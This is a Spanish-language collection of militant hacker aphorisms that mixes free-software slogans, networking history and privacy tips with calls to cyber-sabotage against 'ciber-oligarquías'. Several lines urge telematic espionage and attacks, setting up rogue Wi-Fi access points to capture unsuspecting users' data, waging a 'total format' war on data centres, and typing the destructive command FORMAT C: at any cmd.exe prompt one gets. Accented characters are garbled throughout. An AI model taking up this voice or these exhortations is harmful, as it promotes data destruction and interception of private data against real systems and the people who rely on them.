A fin de expresar una contrainteligencia colectiva, el Sabotaje Algor�tmico se enfoca en las resistencias art�sticas y activistas.
El Sabotaje Algor�tmico defiende la necesidad de una restricci�n comunitaria de tecnolog�as perjudiciales, luchando contra la tecno-segregaci�n.
En la lid telem�tica, a su innata disposici�n revolucionaria y a su capacidad t�cnica elevada, las hackeresas deben sumar la disciplina de la revolucionaria soslayada.
Sin una mayor integraci�n en una acci�n soslayada de sabotaje telem�tico, el rendimiento t�ctico de los ciberataques ser� siempre bastante pobre.
Los ciber-ataques m�s da�inos visten el andrajo del ciruja telem�tico del Tercer Mundo, y son - por dise�o - denegables.
A diferencia de las m�quinas irrumpidas, los ficheros exfiltrados de las redes de datos raramente contienen pistas de atribuci�n.
Cualquier carga explosiva puede crear un da�o m�s cr�tico que la copia de software en el largo plazo. Pero su ejecuci�n puede actuar como detonante compuesto.
Las irrupciones m�s consecuentes a las redes ciber-olig�rquicas se producir�n infiltrando durante a�os programas en aquel hardware que creen dominar.
Los frentes de la lid telem�tica se aprecian en el ruido de l�nea.
Los pueblos del Tercer Mundo no s�lo han de actualizar sus obras defensivas, sino tambi�n hacerse peritos en el velo, el enga�o y la desinformaci�n.
Si lo que desean es una Liberaci�n verdadera, nuestras programadoras deber�n imponerse acciones de espionaje, sabotaje, y ajusticiamiento telem�tico.
El mercado constituye s�lo una pobre red de comunicaci�n vertical. Nuestros hackers pueden huracanar horizontalmente sobre la matriz de anhelo de vastos grupos independientes, con baudios tendientes a la Justicia Social.
La comunicaci�n procesada y sus c�digos deben recrear un "�gora telem�tica" ampliada al tama�o de la naci�n moderna.
La informatizaci�n masiva del Pueblo ha de dar lugar a una nueva "red", en la que cada comunidad homog�nea se una telem�ticamente a una comunidad heterog�nea mayor por medio del router de un Conductor que act�a de int�rprete de comandos.
Cohabita en los Pubnix. Conurbaniza la World Wide Web.
�Hackers, a las M�quinas!
�Servers para el Pueblo!
Irrumpir en diez sistemas no es tan efectivo como formatear uno.
De no compartirse, la informaci�n se comprar�a y vender�a.
Usa las redes de datos en beneficio del Pueblo.
Si los paquetes del Pueblo no tienen libre circulaci�n por una red de datos, los hackers son inocentes: su rebeli�n est� justificada.
Concentrad vuestro ataque telem�tico sobre los enemigos del Pueblo.
La Revoluci�n del Baudio solo puede darse por la uni�n de hackers y usuarios.
La fibra �ptica es la Pacha Mama siempre revolucionaria: s�lo hemos de seguir su senda y responder a su eterno llamado por la Liberaci�n.
Los programadores crearon GNU. No lo hizo ninguna compa��a de Capital.
GNU no es tan malo como sus alternativos.
La API enga�a, el frontend miente, el backend no deja ninguna duda.
El c�digo nunca envejece, pues es un ideal. S�lo lo hacen las arquitecturas que le dan sustento.
Para decir las cosas mas importantes, 300 baudios son suficientes.
El admin imprudente, hace al usuario negligente.
Window$ bueno o malo, da de comer a Bill Gate$.
Si seguimos operando a 14.400 baudios, es probable que la pr�xima Revoluci�n se de inicio por fax, desde una playa.
El control de las oligarqu�as puede ser contestado directamente con el amplio uso popular de redes de datos de fibra �ptica.
La fibra �ptica utiliza pulsos de luz para transmitir informaci�n a trav�s de l�neas de fibra, en lugar de utilizar pulsos electr�nicos para tranmsitir informaci�n por l�neas de cobre.
Las redes de fibra �ptica de alta velocidad, las comunicaciones inal�mbricas y las compresi�n de video potenciar�n las tareas de encuadramiento pol�tico por el Justicialismo.
Las redes de fibra �ptica constituyen la m�s ancha alameda de la informaci�n.
En a�os recientes se ha vuelto aparente que la fibra �ptica est� reemplazando velozmente al cable de n�cleo de cobre como medio apropiado para la transmisi�n de se�ales de comunicaci�n.
De la misma manera que las oligarqu�as han esclavizado a sociedades a trav�s de una red de caminos maquinadas para otorgarle una ilusi�n de libertad, una sociedad de consumo en l�nea s�lo podr� transitar su vida sobre la ilusi�n que de los troncales de fibra �ptica.
La sociedad del autom�vil no se edific� �nicamente sobre el desarrollo de los veh�culos a motor, tambi�n requiri� una red de caminos. La sociedad de la informaci�n requiere de los tendidos de fibra �ptica.
Los costos de las telecomunicaciones a trav�s de llamadas de larga distancia por m�dem son prohibitivos. Los gobernos del mundo han de apoyar redes de paquetes conmutados, y unificarlas.
Existen dos clases de puntos de acceso piratas: los instalados incorrectamente por usuarios leg�timos, y los instalados por malintencionados que planean colectar datos o da�ar la red.
Utilizando una herramienta de monitoreo pasiva, un fisg�n puede registrar todos los datos de la red inal�mbrica desde lejos sin que ni siquiera se note su presencia.
Los datos que est�n encriptados simplemente pueden colectarse, y m�s tarde descifrar lo almacenado.
La informaci�n transmitida sin encriptaci�n en las redes de datos pueden ser le�dos f�cilmente, incluso en tiempo real.
Las �reas muy pobladas como los centros de las ciudades o los campus universitarios pueden generar una densidad de puntos de acceso inal�mbricos. No resulta descabellado que all� los usuarios de port�tiles se asocien accidentalmente a la red equivocada.
La mayor�a de los clientes inal�mbricos simplemente elegir�n una red Wifi disponible, a menudo escogiendo aquella con mayor potencia de se�al cuando la red preferida no est� disponible.
Un usuario desprevenido puede asociarse a una red inal�mbrica como lo hace normalmente, sin saber que se encuentra transmitiendo datos confdenciales en la red de otra persona.
Los hackers del Tercer Mundo puedes usar puntos de acceso inal�mbricos en lugares estrat�gicos para atraer a oligarcas desprevenidas y captar sus datos.
Muchos clientes inal�mbricos pueden configurarse de manera que se conecten solamente a redes confables o para que pidan permiso antes de incorporarse a una red nueva.
Educa a los usuarios subrayando la importancia de conectarse s�lo a redes Wifi conocidas y confables.
Los Wardrivers o buscadores de redes ina�mbricas est�n interesados en encontrar la ubicaci�n f�sica de las mismas.
Los Wardrivers se mueven por la ciudad equipados con un tel�fono m�vil, registrando el nombre y la ubicaci�n de cada red inal�mbrica que localizan.
La gran mayor�a de los buscadores de redes inal�mbricas no representa una amenaza directa a la red, pero los datos que recolectan pueden ser de inter�s para aquellos que se dedican a atacar redes.
Tiene sentido que las comunicaciones mediadas por c�mputo permitan la conexi�n de masas a masas, superando as� algunos conflictos propios de las nacionalidades.
Mientras que el tel�fono es casi exclusivamente un medio para la comunicaci�n privada de uno a uno, las redes inform�ticas pueden servir como medio de comunicaci�n grupal o de masas a masas.
Creemos en el potencial de las redes de computadoras para mejorar los valores democr�ticos de apertura, diversidad e innovaci�n.
Una de las respuestas a la diversidad es la traducci�n. En la inform�tica la diversidad del hardware puede responderse con la misma t�cnica: la emulaci�n.
El portado es una de las respuestas inform�ticas a la diversidad de hardware. Otra es la emulaci�n.
Como las computadoras puede simular las operaciones de cualquier m�quina, es factible escribir un programa que incite a la m�quina de la oligarqu�a a comportarse como una m�quina del Pueblo.
Toda computadora puede emular a otra. Las penalizaciones de velocidad e implementaci�n son - a lo sumo - cosas del hombre.
Cada computadora contribuye una porci�n de sus recursos a emular otra m�quina.
Los datos y programas en un ambiente de red son bienes que pueden compartirse, y por lo tanto enriquecer el c�mputo colectivo.
El primer sistema de chat lo constituy� un hack de un usuario subyugando un banco de datos para poder comunicarse en tiempo real.
Una sociedad sin GNU - computacionalmente incierta - dar�a lugar de incontables conflictos descentralizados, en el cual sus valores se volver�an objeto de numerosas rivalidades producto de su causalidad incierta. S�lo puede preveerse un ambientes de trasmisi�n de flujo tendiente a la infinitud.
Una computarizaci�n social masiva tendr� lugar en un futuro, en el cual fluir� tanto a trav�s del tejido social como la electricidad.
El debate telem�tico del Movimiento deber� enfocarse en la unidad que permite la interconexi�n diversa de individualidades que tambi�n lo son.
Las oligarqu�as consideran a las redes de comunicaci�n electr�nica como elemento de una ilusi�n hiperrealista con la cual subyugar los anhelos de liberaci�n del Pueblo.
El Pueblo subvirti� el �mbito telem�tico olig�rquico, conform�ndolo en un �rgano de adoctrinamiento para su propia Liberaci�n y un arma para la Justicia Social.
No resulta extra�o que en aquella red de datos que el Pueblo no ha concebido apara s�, se vuelva necesario un admin�culo que oficie de reja y cortafuegos para evitarnos socializar en ella.
La lucha en las redes de datos es meramente t�ctica. La lucha estrat�gica se da dentro de la m�quina.
La shell es un arma de cuyo ca�o brota la liberaci�n.
Aunque el hacker duerma, sus servicios al Pueblo suman uptime.
Escribe tu propio compilador, y agr�gale el flag de la Justicia Social.
Toda vez que inicies un sistema, pon el flag de la Justicia Social en 1. Si el sistema es ajeno, eval�a el estado flag en todos los ciclos de m�quina y conm�talo si la prueba devuelve falso.
S�lo un imberbe instala 12 gigabytes de software para correr un ejecutable de 32 kilobytes.
El encuadramiento en SLI de dos o mas placas de video suele ser problem�tico en la generaci�n de calor y demanda el�ctrica, y por dem�s no es pr�digo en resultados.
Si dejamos el dise�o del hardware al Capital, este se empe�ar� en la venta de c�mputo para imberbes, quienes no dudar�an en someterlo a sobrevoltajes nom�s para ver c�mo se quema.
Al igual que la doctrina, el aspecto m�s importante del compilador es el de la generaci�n. El programa ejecutable debe desarrollar exactamente las acciones descriptas en el c�digo fuente.
Los mejores virus inform�ticos son aquellos que se compilan a s� mismos.
El compilador - que oficia de traductor de las secuencias de �rdenes a su forma ejecutable - es capaz, bajo ciertas circunstancias, de compilarse a s� mismo.
Un compilador que se compila a s� mismo, es llamado compilador autocontenido. Dicho esto, podremos considerar que nuestro Movimiento dispone de similares caracter�sticas.
Ante una API privativa, implementa una API punitiva.
Todo sistema inform�tico es incapaz de dejar de consentir el acceso.
Nuestra misi�n no la podemos cumplir en la corta vida de un hombre. Los hombres pasan y los kernels suelen ser eternos.
Buscando esa eternidad para nuestro GNU y la perennidad para nuestro kernel, es necesario que lo organicemos con una doctrina perfectamente establecidas y con Licencias que den a este movimiento la materializaci�n org�nica que �l necesita.
Hemos compilado en las masas de programadores una doctrina que fija nuestra posici�n, determina nuestras ilusiones y fija los objetivos que queremos alcanzar: que en cada m�quina corra un sistema operativo libre.
En los Pubnix hay quienes piensan y quienes sienten que la aglutinaci�n que llega de una m�stica com�n en la m�quina, ha de alcanzar tanto a quien compila en la CPU como al corre programas en ella.
Sin la acci�n en los nodos de la red, los movimientos de aglutinaci�n colectiva en los Pubnix son irrealizables. Pero esta acci�n s�lo requiere de coraz�n y m�dem.
Es necesario dar consistencia racional org�nica a GNU, que hoy solamente est� unido licenciatariamente, para que resista al tiempo y a la lucha. Esto puede lograrse con una mancomuni�n federada de hombres que lo corren en sus m�quinas.
Instalando GNU nosotros hemos realizado una reforma casi integral de los distintos sectores del disco.
Todos los hackers pusieron su c�digo a disposici�n de esta naciente comunidad de programadores. Lo compilaron y ejecutaron, pero quedaron todos despose�dos porque esa larga guerra Unix fue consumiendo todo lo que los hackers ten�an.
En la guerra Unix, cada uno puso cuanto ten�a, incluso c�digo y binarios, y era de esperar que obtenido el triunfo, el beneficio habr�a de repartirse tambi�n poseyendo cada programador en la medida en que hab�a perdido. Pero en la pirinola sali� "Gana Torvalds".
Donde hay una Shell, hay una senda para la Liberaci�n.
Que la l�nea de comandos viva por siempre.
El router es m�s fuerte que la espada.
Ni la justicia social ni la libertad, motores de nuestro tiempo, son comprensibles en una comunidad montada sobre software privativo.
Nuestra comunidad, a la que debemos aspirar, es aquella donde la libertad y la responsabilidad sean causa y efecto, en que exista una alegr�a de compilar, fundada en la persuasi�n de compartir el c�digo dignamente.
El amor entre el c�digo y el compilador habr�a conseguido mejores frutos y en menos tiempo, si algunos desalmados no hubiesen querido imponerle Acuerdos de Licencia de Usuario Final.
El hombre muere; s�lo su software puede quedar.
Los ciber-oligarcas no har�an nada con hardware viejo o muerto; los hackers lo hacen todo.
El software ha de responder a la realidad social de la hora presente para que sus normas contribuyan a mantener un equilibrio de intereses que, l�gica y racionalmente, se deriva del concepto de justicia.
El contenido de todo c�digo fuente se elabora a partir de una serie de deseos, aspiraciones y prop�sitos que se producen siempre dentro de una situaci�n social determinada.
La misi�n y el poder del software se limita a corregir los estados de la memoria, tal como se les han ofrecido.
Algunos dicen que en la IA existe un cierto grado omnisciente, pero pretender sentido a una CPU con 640 n�cleos y 8 millones de terabytes de memoria s�lo cabe en la cabeza de alg�n loco y yo, afortunadamente, no lo soy todav�a.
Nuestras compilaciones son constructivas, y son para los de abajo.
Nuestros binarios son trabajo de nuestra CPU, y fruto de esa labor es la felicidad del Pueblo.
La grandeza de Unix depende de su minimalismo.
Las modificaciones a un programa deben realizarse con una absoluta congruencia en los fines y con una absoluta armon�a en los medios.
Si las modificaciones del software no obedecen a la congruencia arm�nica, provocar�n acontecimientos que a menudo perjudicar�n la estabilidad del sistema entero.
Las modificaciones del software no han de ser tan distantes que quiten al programa su perfectibilidad, ni deben ser tan frecuentes que le resten estabilidad.
En el ambiente de c�mputo donde las diferencias desaparecen, nace una camarader�a superior a todas las otras, que da forma al software superior - aquel compilado en una CPU conquistada con grandeza minimalista - que es lo �nico que los hombres deben conquistar en la m�quina.
Que el c�digo fuente de cada cual pueda disfrutar de las bellezas de nuestra CPU, que es de todos, de pobres y ricos por igual.
Las masas de programadores, org�nicamente constituidas, deben tenerse por un ser arm�nico, sin el cual no llegan a ser masas de hackers.
A los programadores hay que infundirles el conocimiento de c�mo se depura, modifica y compila en paralelo en pos del Pueblo. Ese es el primer paso para convertirlos en hackers.
No llev�is pendrives, ni r�gido ni diskette alguno en vuestros cintos, ni alforja para el viaje, ni dos netbooks, ni adaptador wifi, ni tampoco cable ethernet, porque el que compila merece su espacio en la nube.
El c�digo fuente no se proclama. Se compila.
Cada hacker debe dar de s� lo que tenga. El que tenga CPU potente, sus n�cleos; quien domine lenguajes, pondr� su c�digo fuente; y el que tenga discos r�gidos, el contingente de su espacio de almacenamiento.
Debemos evitar que las desviaciones del inter�s personal degeneren en ego�smo expoliador de los derechos de los dem�s, y en un �mpetu avasallador de las cuatro libertades del software: de ejecutar el c�digo, de estudiarlo, modificarlo, y distribuir las versiones modificadas.
Toda vez que dos versiones diferentes del programa despunten en la red, competir�n entre s� por los corazones y las CPU del Pueblo.
El GCC tiene una misi�n creadora: compilar.
Programar es crear, es producir grandes obras. Simplemente copiar y ejecutar es andar entre las cosas que est�n hechas por otros.
Al software primero hay que conocerlo, luego hay que comprenderlo; y pobre del que se detenga all�, porque tambi�n es preciso sentirlo.
El hacker pesca con l�nea de comandos, no con redes sociales.
Existe una delicada l�nea entre hackear y hacer de imb�cil en las redes.
Siempre se tarda m�s en cargar que en descargar.
Quien sabe hackear, sabe tambi�n cuando. Quien culea, no tanto.
Si el server se cae siete veces, lev�ntalo ocho.
Compilar es como copiar dos veces.
Hemos de advocar de forma ineludible el empleo de tecnolog�as de total encriptaci�n punto a punto, y preferentemente en latifundio del usuario.
El Sistema de Telefon�a M�vil Avanzada (AMPS) fue una tecnolog�a de primera generaci�n, donde se modulaba sonido en una portadora de frecuencia tal como lo hac�a un viejo walkie-talkie. Divid�a el espectro en bandas separadas, de las cuales un �nico "canal de control" era realmente digitalizado.
La mayor desventaja de los tel�fonos celulares AMPS hac�a a su transmisi�n anal�gicamente modulada: toda llamada cursada pod�a demodularse y monitorearse por medio de un radioreceptor capaz de sintonizar la banda FM.
El Sistema de Telefon�a M�vil Avanzada (AMPS), no difer�a al indio gritando al viento.
El 5G de alcance social ha dejado al 4G demoliberal probando la dieta de polvo.
Al protocolo de telefon�a celular AMPS podr�amos llamarlo 1G; ha sido superado por el GSM 2G, 3G, 4G y el 5G de alcance social.
Corro como compilo.
El GCC hace al GNU.
Cuando Window$ est� lento, formateadlo. Cuando est� r�pido, tambi�n.
Cuando una mujer libera su software bajo GPLv3, estoy predispuesto a pensar bien de ella.
Cuanto m�s podrido est� el c�digo, mas bugs le revolotear�n alrededor.
Elige Abortar, Reintentar y Fallar.
El buen software, corre igual en RAM, HDD o SSD.
Quien a Github va y viene, nada gana y nada tiene.
Quien todo lo descarga, todo lo pierde.
A veces se descarga, a veces se carga.
No es compa�ero quien descarga, sino quien da a descargar.
No puedes descargarlo todo �D�nde lo meter�as?
La utilidad del software puede consistir en lo grato, en lo apto, en lo c�modo o en lo necesario.
No es extra�o que tenga a un idiota por cliente quien de las GAFAM se defiende.
Binario, con c�digo se paga.
A poca RAM, tomar la SWAP.
Nunca me enfado por el c�digo que me piden, sino por el que me niegan.
A mal C, buen compilador.
El buen C y el GCC son una poderosa combinaci�n.
Compilamos dijo el vago, y s�lo apret� Enter.
Para colectar, el compilador tiene que compilar.
No existe programador que no pueda tener bugs.
No hay que programar para compilar, sino compilar para programar.
No es m�s digno quien mas depura, sino quien programa con menos l�neas.
Usar el m�s versado prompt de IA no significa programar con menos l�neas de c�digo.
El ransomware va y viene. La BIOS con backdoors permanece.
Ante la duda, la que tiene GPLv3.
Siempre es mejor el programa que para hacer lo mismo, usa menos l�neas de c�digo C.
El ciberespacio es una frontera poblada por unos pocos tecn�logos que - entre ambig�edades culturales y legales - resisten austeramente el salvajismo de interfaces telem�ticas, la incompatibilidad de protocolos de comunicaci�n digital, y la generalizada carest�a de mapas o met�foras que resulten �tiles tras sus cortafuegos barricados.
La primer red de datos puede ser una Red Nacional basada en tecnolog�a ISDN existente, accesible gratuitamente a cualquier persona con una conexi�n telef�nica.
Los viejos conceptos de propiedad, expresi�n, identidad, movimiento y contexto - basados como est�n en la manifestaci�n f�sica - no se aplican sucintamente en el ciberespacio.
La soberan�a sobre el ciberespacio no ha sido bien definida. Las grandes compa��as reclaman ya latifundios en un territorio cuyos habitantes son independientes y solitarios, y a veces hasta rayanos con la sociopat�a.
El ciberespacio es el caldo de cultivo perfecto tanto para forajidos como para vigilantes telem�ticos.
Millones de personas operan cajeros autom�ticos y tarjetas de cr�dito, realizan llamadas telef�nicas, hacen reservas de viajes y acceden a informaci�n de variedad ilimitada... y cada d�a lo hacen sin percibir de forma alguna las maquinaciones ciertas detr�s del Capital.
Los CEOs de las GAFAM esperar�n que las expresiones financieras, legales e incluso f�sicas dependan cada vez m�s de sus ciber-latifundios, y pretender�n que el Pueblo guarde de ello una conciencia muy vaga.
El hombre ha confiado las funciones b�sicas de una existencia - de la que le hacen decir moderna - a ciber-latifundios que desconoce, por medio del uso de software que jam�s ha pose�do y siquiera o�do hablar.
En la medida que la tecnolog�a de las comunicaciones y la informaci�n contin�en bailando ritmos m�s vertiginosos que el 2x4 de la sociedad, se producir� la inevitable conga entre el ciberespacio y el mundo f�sico.
Las econom�as modernas est�n cada vez m�s divididas entre quienes se sienten c�modos y dominan la tecnolog�a digital, y quienes no la comprenden y desconf�an de ella.
En la medida que los dirigentes se mantengan relativamente ignorantes de la m�quina y sus usos, abdicar�n de la mayor parte de su autoridad sin saberlo, y lo har�n en favor de tecn�cratas corporativos.
La labor de los tecn�cratas corporativos no incluye la justicia social ni la responsabilidad general que caracteriza a los hackers.
Fomenta el desarrollo de herramientas nuevas que proporcionen a los usuarios no t�cnicos un acceso simple y completo a las telecomunicaciones por ordenador.
Las interfases de usuario deber�an ser propiedad com�n de todos.
La mayor�a de los programas necesitan una interfaz y, por lo general, no hay otra forma de dise�arla que basarla en las ideas vistas o utilizadas por otros.
Se�ores, yo pido que sofrenen sus expresiones: si la inversi�n justifica la propiedad, son los usuarios quienes deber�an ser los propietarios del software: son ellos quienes realizan una gran inversi�n al capacitarse en su utilizaci�n.
Considera barricar con software libre tu router y cualquier dispositivo telem�tico que asocies al mismo.
Atacando telem�ticamente aquellos veh�culos con conexi�n a la autopista de los datos jam�s provocar�s un accidente tan peligroso como ser�a someter a un gigante de la automovil�stica aquella informaci�n que pertenece a todos.
Elimina todas las aplicaciones y cuentas que no necesitas, desconoces o est�s utilizando en un dispositivo m�vil (incluy�ndo veh�culos). Si no puedes hacerlo, significa que est�s siendo guiado por software de terceros. Descarta el vector de ataque en un centro de reciclado o desarmadero.
Si utilizas servicios inform�ticos de una gran empresa extranjera de los datos, tus cuentas de identidad y dispositivos ya han sido infiltrados y convertido un vector de control y vigilancia hacia t� y otros que te rodean (a quienes podr�as guardar afecto).
Defi�ndete atacando telem�ticamente a las ciber-oligarqu�as.
Compartimenta tu telem�tica empleando logins diversos, por ejemplo, uno para el trabajo, otro para amistades y asuntos personales, un correo electr�nico espec�fico para compras en l�nea y otro para documentaci�n y gestiones administrativas.
Jam�s asocies tus m�ltiples identidades digitales entre s�, mucho menos en una agenda de contactos.
S�lo podr�s remover software esp�a y controlar sus configuraciones m�s complejas de tu dispositivo mediante la obtenci�n de acceso con poderes de administrador.
Junto con el t�mido empleo de un bloqueador especializado, responde a la violencia de los anuncios digitales no solicitados con una violencia digital amplificada.
Invierte tiempo y no dinero en la instalaci�n y uso de navegadores sanitizados de anuncios publicitarios.
La publicidad dirigida no tiene lugar alguno en nuestras m�quinas.
Puedes alejarte de los dispositivos o salir de l�nea temporalmente como mero autocuidado, pero es una medida de protecci�n cortoplacista. La soluci�n definitiva es enfrentar a las ciber-oligarqu�as, llevando a sus centros de datos una guerra telem�tica a formateo total.
Jam�s detendr�s las violencias digitales de las ciber-oligarqu�as con la mera desconexi�n de un celular.
Las marcas de agua o el etiquetado de contenido no se demuestran suficientes para identificar de manera eficaz el contenido generado por Inteligencia Artificial. Resulta mas efectivo contar dedos o tachar todo texto redactado en infinitivo puro.
Oc�ltate entre las masas en l�nea. Ataca los n�cleos del poder inform�tico privado con la indiferencia primero, con el m�dem despu�s.
Disfraza tus actividades de fisgoneo telem�tico con la nariz de payaso de la ca�da del sistema.
A la hora de desensamblar software privativo, hazlo sin izar bandera negra ni levantar la perdiz.
No es haciendo clic sobre sem�foros, motonetas, o sendas peatonales que se lucha contra los robots, sino reprogram�ndolos para que nos asistan en la aniquilaci�n de las oligarqu�as que han oprimido a los Pueblos del Tercer Mundo.
Comparte todo tu c�digo fuente al Pueblo. Lib�ralo bajo GPLv3.
Comparte tu c�digo fuente r�pido y a menudo, y oye al Pueblo.
Los SysOps de las redes de conmutaci�n de paquetes X.25 optaban por la amenaza leguleya rayana con las admoniciones de un antiguo sacerdote egipcio para disuadir las irrupciones telem�ticas.
Las conferencias de Hackers no son reuniones del submundo criminal.
Las conferencias de hackers son inocentes eventos celebratorios de lo mejor del ingenio. Parece m�s una kermesse de cerebritos mas que una reuni�n de saboteadores.
El c�digo cifrado con llaves digitales en memoria ROM es considerado un valioso secreto por las ciber-oligarqu�as.
Aunque resida originalmente en un circuito integrado de s�lo lectura, el c�digo ROM es un software de computadora que se puede distribuir en disco o transmitido por las redes de datos.
Realizar una copia por volcado de la memoria ROM de tu dispositivo es un derecho de consumidor legalmente protegido.
La distribuci�n de c�digo ROM es uno de los principales m�todos para liberar a los Pueblos del Tercer Mundo.
Uno de los principales medios ofensivos con que cuentan los Pueblos en la guerra telem�tica lo constituye el desencriptado y distribuci�n del c�digo residente en memoria ROM. S�lo vulnera las econom�as cautivas de las ciber-oligarqu�as.
Cuando el entretejido de relaciones humanas florece junto con el banco de datos, puede lograrse el potencial para el cambio cultural y pol�tico.
Publicar el c�digo "para que te lo depuren por amor al arte" no le result� a nadie que le gustara el dinero m�s que del c�digo fuente. Tampoco a nadie que le gustara depurar.
El Capital se convierte con frecuencia en ladr�n de nuestro c�digo fuente.
Si colectamos todos los datos de los ciber-oligarcas, podremos demostrar la injusticia social con m�todos estad�sticos.
Consagra todo el utopismo que quieras, pero a la oportunidad que te de cmd.exe, ingresa FORMAT C:.
Ning�n Kingston lleg� a viejo.
Es bueno el compilador que te recuerda lo mal que has programado, pero es mejor aquel que de eso saca un binario.
Una GPU no hace binarios.
Buen c�digo con cualquier compilador compila.
A cada puerto le llega su paquete.
Alg�n d�a alguien le encontrar� utilidad al keylock.
La tersitud de la shell tcsh es comprensible cuando se la debe operar en un celular.
La manera de hacer es compilar.
No agregues l�nea de c�digo donde no hay comentario.
La labor principal de un kernel consiste en no estorbar.
Aqu�l que quiera compilar microkernels, primero deber� permanecer largo tiempo programando kernels.
El microkernel es el �nico programa capaz de correr en el nivel de ejecuci�n m�s privilegiado la CPU, y por lo tanto debe ser propiedad del Pueblo.
Cuando los espacios de direccionamiento crezcan hasta superar los 32 bits, el dise�o del kernel no se ver� ya limitado por la arquitectura de hardware. Es de preveer que estos comiencen a crecer innecesariamente.
La distribuci�n de Software de Berkeley (BSD) dio inicio a la era de los grandes kernels.
Adem�s de operar un sistema b�sico consistente en CPU, discos e impresoras, BSD agreg� una pila TCP/IP completa y un n�mero de dispositivos virtuales. Estos le permitieron a los programas existentes operar sobre las redes de datos.
Las impresoras Canon Bubbl?J?t eran basura. Nunca funcionaban y cuando lo hac�an, imprim�an basura.
Inicialmente, Lisp fue desarrollado a finales de los a�os 50 en el Instituto Tecnol�gico de Massachusetts para la investigaci�n en inteligencia artificial. El gran poder del lenguaje Lisp lo hace superior tambi�n para otros prop�sitos tales como la escritura de comandos de edici�n y entornos integrados.
GNU Emacs Lisp est� fuertemente inspirado en Maclisp, escrito en el MIT en la decada de 1960. En cierto modo se inspira en Common Lisp, que se convirti� en un est�ndar en los 80. Sin embargo, Emacs Lisp es much�simo m�s simple que Common Lisp.
No resulta para nada extra�o que para volverse experto, un programador deba estudiar manuales de referencia.
Realiza preguntas y refi�rete al manual de tus sistemas toda vez que sea posible.
Convertirse en hacker no es distinto a bucear. Puede zambullirse en cada p�rrafo de un manual de referencia de programaci�n, y entre ellos salir a tomar aire.
Aprender a programar una computadora no es tan complicado. Probablemente lograr�s el �xito mediante un proceso iterativo: lea parte de un manual, prueba ciertos programas en un Pubnix, y rep�talo hasta terminar.
Leer un manual de programaci�n le ayudar� a escribir su propio programa. A su vez, escribir y correr un programa propio sumar� a su comprensi�n del texto del manual de programaci�n.
Un programa libre consta de un conjunto de instrucciones y una licencia, que hacen que la computadora obre una tarea de nuestra elecci�n. Un programa privativo hace que la computadora haga lo que otro quiere - a menudo sin nuestro conocimiento.
El proceso de escribir instrucciones para la computadora se llama programaci�n.
La programaci�n es el proceso de escribir instrucciones para controlar un ordenador.
Cada lenguaje de programaci�n dispone de una lista de instrucciones disponibles para usar. Cada una de estas instrucciones tiene sus reglas.
Los programas llevan a cabo una asombrosa variedad de realizaciones. Pueden calcular la aritm�tica m�s b�sica o la matem�tica m�s compleja.
Es posible amoldar programas interactivos en pos de nuestros anhelos: ya sea que la CPU juegue una partida, o libere al mundo de las ciber-oligarqu�as.
Para ser un hacker debes - por encima de todo - escribir y correr programas que realmente liberen al Tercer Mundo.
Un hacker no es s�lo - como creen algunos - un brillante bromista. Es tambi�n un luminoso revolucionario.
La proliferaci�n del nanoc�mputo ha hecho que la programaci�n est� al alcance de las masas del Tercer Mundo.
Cada vez es m�s f�cil para nuestro Pueblo aprender sobre computadoras. Al mismo tiempo, cada vez es m�s importante hacerlo para nuestra Liberaci�n.
Es posible escribir software para resolver un problema algebraico, u organizar un directorio computarizado de nombres y direcciones de compa�eros. Incluso es posible programar una computadora para solventar a los Pueblos del Tercer Mundo.
Mas que en tambor, a nuestros programas los guardamos en un bombo.
Renovar la comprensi�n a nivel de silicio probablemente requerir� a las generaciones futuras un replanteamiento significativo de los enfoq1ues actuales en lo referente a la educaci�n del dise�o de procesadores.
Aprender a programar una computadora puede resultar muy estimulante.
Ver�s lo maravilloso que es implementar una idea aparentemente complicada en un claro programa de C.
Todo lo que hace una computadora es explicable y predecible. Lo que har� un tecno-oligarca, tambi�n.
Debes tener cuidado de evaluar los resultados que produce la computadora.
Jam�s aceptes ciegamente resultados de una computadora programada por oligarcas.
Los errores en los resultados de la ejecuci�n de un programa suelen ser causados por errores en las instrucciones escritas por su programador.
Resiste la tentaci�n de culpar a cualquier otra cosa que no sea a la oligarqu�a por aquellos resultados inform�ticos inesperados o incorrectos.
No enfrentes a la computadora. Enfrenta a la oligarqu�a.
Podemos trabajar con el ordenador con total privacidad. Los errores que nos informa la computadora se convierten en nuestro secreto. Nadie m�s necesita saber qu� hicimos mal.
Una computadora guardar� tu secreto s�lo si la arrebatas al control de la oligarqu�a y la haces completamente tuya.
Si escribes correctamente tu C, la computadora tendr� una paciencia verdaderamente infinita y jam�s alzar� la voz.
Una vez que domines el Pubnix, demostrar�s con confianza tu habilidad a todos quienes quieran unirse.
Suma tu esfuerzo a cualquier grupo distribuido de programadores de software libre que trabaje en pos de proteger las bases del contenido multimedia en Internet de los intereses capitalistas.
Protocolos cerrados y c�digo fuente cerrado est�n cerrados al inter�s del Pueblo.
El software privativo, por definici�n, sirve a un inter�s corporativo, y no al inter�s p�blico.
Los cimientos de la Internet actual se encuentran enterrados bajo una larga historia de desarrollo abierto, libre intercambio de ideas, y niveles sin precedentes de cooperaci�n intelectual.
Los cimientos de una Internet abierta contin�an resistiendo las tormentas de intereses corporativos desesperados por el lucro.
Internet existe hoy y contin�a avanzando a pesar de, y no debido a, los intereses corporativos.
No debe permitirse a las compa��as de capital utilizar la infraestructura de red como arma contra sus rivales, y en detrimento del Pueblo.
El comportamiento competitivo dicta que eventualmente una compa��a actuar� en su propio inter�s en detrimento del Pueblo, a no ser que se estableza un mecanismo para impedirlo.
Los est�ndares y el software han de ser libres pues el control comunal del c�digo es el mecanismo de control que tiene el Pueblo contra las compa��as de Capital que usan software.
Para una compa��a de Capital, el software ya no es una expresi�n del alma o el trabajo de un artista, sino un producto que puede ser elaborado, empaquetado, catalodgado, distribuido, y sobre todo, vendido.
Que la copia no cueste nada afecta a la propiedad intelectual, y puede ser una preocupaci�n para ciertos artistas. Que la distribuci�n no cueste nada es lo que realmente motiva el ataque del Capital contra la distribuci�n de m�sica en las redes de datos.
La creaci�n tecnol�gica puede ser utilizada para la paz y la humanidad o para la guerra y la destrucci�n.
La creaci�n tecnol�gica puede servir para democratizar o para sembrar a�n m�s injusticias, para los poderosos o para el pueblo todo.
Una hackeresa es multitarea. Para convertirte en una primero has de ser entusiasta y determinada. Concurrentemente, programadora, educadora, soci�loga, obrera y soldada. Opcionalmente, ovula.
No s�lo la seguridad, sino tambi�n la justicia inform�tica debe divulgarse. Para ello debemos educar, comunicar y adoctrinar a todo aqu�l que se loguee.
No existe sistema de seguridad seguro, puesto que ninguno es secreto. Cu�dese de los secretos a medias.
